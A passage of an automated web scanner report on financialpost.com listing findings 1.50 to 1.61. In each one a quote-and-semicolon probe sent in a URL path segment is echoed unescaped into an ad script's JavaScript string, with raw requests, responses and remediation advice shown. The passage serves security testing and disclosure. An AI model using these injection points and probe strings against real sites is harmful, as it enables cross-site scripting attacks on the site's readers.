Host:   http://www.financialpost.com
Path:   /careers/Texting+lazy+IMHO/3941140/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26269'%3b7e045e51a09 was submitted in the REST URL parameter 3. This input was echoed as 26269';7e045e51a09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Texting+lazy+IMHO/394114026269'%3b7e045e51a09/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62901
Expires: Sun, 19 Dec 2010 03:15:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting-lazy-imho/394114026269';7e045e51a09/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting-lazy-imho;kw=394114026269';7e045e51a09;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95168182?">
...[SNIP]...

1.50. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Texting+lazy+IMHO/3941140/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b2fc'%3b095459ca46b was submitted in the REST URL parameter 4. This input was echoed as 1b2fc';095459ca46b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Texting+lazy+IMHO/3941140/1b2fc'%3b095459ca46b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44669


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting%20lazy%20imho/3941140/1b2fc';095459ca46b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting%20lazy%20imho;kw=3941140;kw=1b2fc';095459ca46b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=109440
...[SNIP]...

1.51. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/writing+workers+with+children/3943108/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1639b'%3b9b5d88f64ad was submitted in the REST URL parameter 1. This input was echoed as 1639b';9b5d88f64ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers1639b'%3b9b5d88f64ad/writing+workers+with+children/3943108/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73488
Expires: Sun, 19 Dec 2010 03:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers1639b';9b5d88f64ad/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers1639b';9b5d88f64ad;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=15492710?">
...[SNIP]...

1.52. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/writing+workers+with+children/3943108/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da20f'%3bafe2f9b541b was submitted in the REST URL parameter 3. This input was echoed as da20f';afe2f9b541b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/writing+workers+with+children/3943108da20f'%3bafe2f9b541b/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70161
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing-workers-with-children/3943108da20f';afe2f9b541b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing-workers-with-children;kw=3943108da20f';afe2f9b541b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17
...[SNIP]...

1.53. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/writing+workers+with+children/3943108/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1b5'%3bbd8a9e4eb8e was submitted in the REST URL parameter 4. This input was echoed as cf1b5';bd8a9e4eb8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/writing+workers+with+children/3943108/cf1b5'%3bbd8a9e4eb8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37340


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing%20workers%20with%20children/3943108/cf1b5';bd8a9e4eb8e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing%20workers%20with%20children;kw=3943108;kw=cf1b5';bd8a9e4eb8e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundT
...[SNIP]...

1.54. http://www.financialpost.com/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2aa'%3b1645e3d562a was submitted in the REST URL parameter 1. This input was echoed as 2f2aa';1645e3d562a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css2f2aa'%3b1645e3d562a/print.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42946


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/css2f2aa';1645e3d562a/print;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=css2f2aa';1645e3d562a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32009377?">
...[SNIP]...

1.55. http://www.financialpost.com/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 680dd'%3b2c367558245 was submitted in the REST URL parameter 2. This input was echoed as 680dd';2c367558245 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/680dd'%3b2c367558245 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42979


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/css/680dd';2c367558245/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=css;kw=680dd';2c367558245;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=73531346?">
...[SNIP]...

1.56. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/story_widget.min.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3389'%3bbf445645e7b was submitted in the REST URL parameter 1. This input was echoed as c3389';bf445645e7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssc3389'%3bbf445645e7b/story_widget.min.css HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:08 GMT
Date: Sun, 19 Dec 2010 02:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43144


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/cssc3389';bf445645e7b/story_widget.min;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=cssc3389';bf445645e7b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16703832?">
...[SNIP]...

1.57. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/story_widget.min.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bee00'%3b7dd73a18789 was submitted in the REST URL parameter 2. This input was echoed as bee00';7dd73a18789 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/bee00'%3b7dd73a18789 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43068


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/css/bee00';7dd73a18789/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=css;kw=bee00';7dd73a18789;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79726192?">
...[SNIP]...

1.58. http://www.financialpost.com/entrepreneur/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec90'%3bc33f3436c73 was submitted in the REST URL parameter 1. This input was echoed as 7ec90';c33f3436c73 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur7ec90'%3bc33f3436c73/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44045


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur7ec90';c33f3436c73/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur7ec90';c33f3436c73;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37177766?">
...[SNIP]...

1.59. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c621'%3b702d19f034f was submitted in the REST URL parameter 1. This input was echoed as 9c621';702d19f034f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur9c621'%3b702d19f034f/Hidden+angels+Magnet+aspiring+startups/3967315/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83762
Expires: Sun, 19 Dec 2010 03:14:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur9c621';702d19f034f/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur9c621';702d19f034f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70166368?">
...[SNIP]...

1.60. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba98e'%3bb4d3a3bee90 was submitted in the REST URL parameter 3. This input was echoed as ba98e';b4d3a3bee90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315ba98e'%3bb4d3a3bee90/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 47894
Expires: Sun, 19 Dec 2010 03:14:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden-angels-magnet-aspiring-startups/3967315ba98e';b4d3a3bee90/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden-angels-magnet-aspiring-startups;kw=3967315ba98e';b4d3a3bee90;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.61. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9386'%3bab3ee5a69d was submitted in the REST URL parameter 4. This input was echoed as a9386';ab3ee5a69d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/a9386'%3bab3ee5a69d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37683


...[SNIP]...
